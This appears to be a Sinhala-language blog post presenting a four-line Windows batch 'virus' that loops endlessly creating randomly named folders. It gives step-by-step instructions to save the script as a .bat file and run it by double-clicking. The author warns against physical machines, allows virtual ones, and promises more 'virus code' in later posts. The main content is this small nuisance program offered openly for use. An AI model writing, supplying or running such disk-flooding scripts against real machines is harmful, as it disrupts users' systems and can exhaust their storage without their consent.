Making over 1000 folders in a few seconds

හරි යාලුවනේ ඔන්න මම අදත් ගේනවා ඔයාලට virus code ක්..අපහු ඉතින් කියන්න දෙයක් නැහැ නේ , මේකත් physical machine වල use කරන්න එපා ! Virtual machine වලට අව්ලක් නැහැ..

මේකෙන් වෙන්නේ ඔයාගේ machine එකේ folders හදනවා එපා වෙනකල් …මේක තමා code එක..

@echo off
:top
md %random%
goto top

virus file එක හදාගන්නේ මෙහෙම..මන් කලින් post එකක කිව්වා නේද හදන විදිහ > notepad එක අරගෙන එකේ code එක paste කරලා.save කරන විදිහ එහෙම .. ඕක copy කරලා අරගෙන save as ගිහිල්ලා file name එකට 1000folders.bat දීල save as type එකට all දීල save කරන්නකෝ…දැන් ඉතින් වැඩේ හරි.

දන් double click කරලා බලන්නකෝ මොකද වෙන්නේ කියලා..folders හදාගෙන යනවා එපා වෙනකල්..

1

මේ video එකත් බලන්නකෝ කරගන්න බැරි අයට ….

THANK YOU ! GOD BLESS YOU ! නැවත හමුවෙමු තවත් virus code එකකින්.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s